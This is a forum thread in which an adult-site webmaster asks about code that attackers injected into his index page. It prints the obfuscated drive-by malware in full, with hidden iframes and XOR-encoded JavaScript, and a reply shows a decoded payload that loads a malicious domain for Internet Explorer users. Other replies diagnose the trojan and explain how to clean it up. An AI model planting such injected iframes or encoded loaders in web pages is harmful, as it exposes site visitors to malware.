GoFuckYourself.com - Adult Webmaster Forum - Someone hacked my TGP and put this code on my index.html

- Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)

- - Someone hacked my TGP and put this code on my index.html (https://gfy.com/showthread.php?t=685804)

Someone hacked my TGP and put this code on my index.html

Does anyone know what this code does? It could be a stats counter for all I know.. Any helpful input is appreciated.

<body bgcolor="#ffffff">
<iframe src='http://wsfgfdgrtyhgfd.net/adv/171/new.php' width=1 height=1></iframe><iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=171' width=1 height=1></iframe><script language="JavaScript">e = '0x00' + '25';str1 = "%9E%C6%CD%D0%BA%D7%D6%DD%CE%C1%99%84%D0%CD%D7%CD% C4%CD%CE%CD%D6%DD%9C%C2%CD%C6%C6%C1%C8%84%98%9E%CD %C0%D4%C5%C9%C1%BA%D7%D4%C7%99%84%C2%D6%D6%CA%9C%8 B%8B%C3%D4%C1%D6%C5%C4%C7%88%C7%CB%C9%8B%C6%C8%D0% 97%8B%84%BA%D3%CD%C6%D6%C2%99%95%BA%C2%C1%CD%C3%C2 %D6%99%95%98%9E%8B%CD%C0%D4%C5%C9%C1%98%9E%8B%C6%C D%D0%98";str=tmp='';for(i=0;i<str1.length;i+=3){tm p = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
</body>
</html>

Thanks in advance!

Eric

i've made numerous posts about this. Remove the iframe and javascript then change all the system passwords as well as your trade script/thumb script pwds and you should be fine.

it's a bot of some sort that's doing it. I've been hit many many times and changing all the pwds was the only way it managed to stop

you got scumware on that box

HTML/TrojanDownloader.Agent.AU

do a search for

http://wsfgfdgrtyhgfd.net

Quote:

decrypt_p("rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic 786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZo LKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49 VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7f yAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiO I3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wES FwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@A POiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1 GucveRszi0v")</script>

This is what is run when the page loads. This calls the decrypt
function and passes it this long string of "garbage".

the decrypt function decodes this into the following javascript program
and inserts it into the web page.

<SCRIPT language="JavaScript">
var browserName=navigator.appName;
if (browserName=="Microsoft Internet Explorer") {
window.status="Done";
document.write('<IFRAME name="PageContainer"
src="http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php" width="1"
height="1" frameborder="0"></IFRAME>');
}
</SCRIPT>

As you can see, the spyware targets only microsoft internet explorer
likely because it has some security flaw the site wants to exploit.
Basically a web page with the decrypt function will set up a small
iframe (1 pixel in size) and load the page at

http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php

Which is presently recorded as being owned by:
Domain Name: WSFGFDGRTYHGFD.NET
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS4.ASDBIZ.BIZ
Name Server: NS3.ASDBIZ.BIZ
Status: ACTIVE
EPP Status: ok
Updated Date: 15-Nov-2006
Creation Date: 12-Oct-2006
Expiration Date: 12-Oct-2007

The web server for this domain is presently down so what the iframe was
actually doing is an open question.

But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.

and more about it here

http://www.aboutus.org/Wsfgfdgrtyhgfd.net

yeah... I've had trouble with that shit too! It is some kind of a trojan. Anyway, what I did, was upgraded wordpress and changed the password to my ftp! Never happend again after that!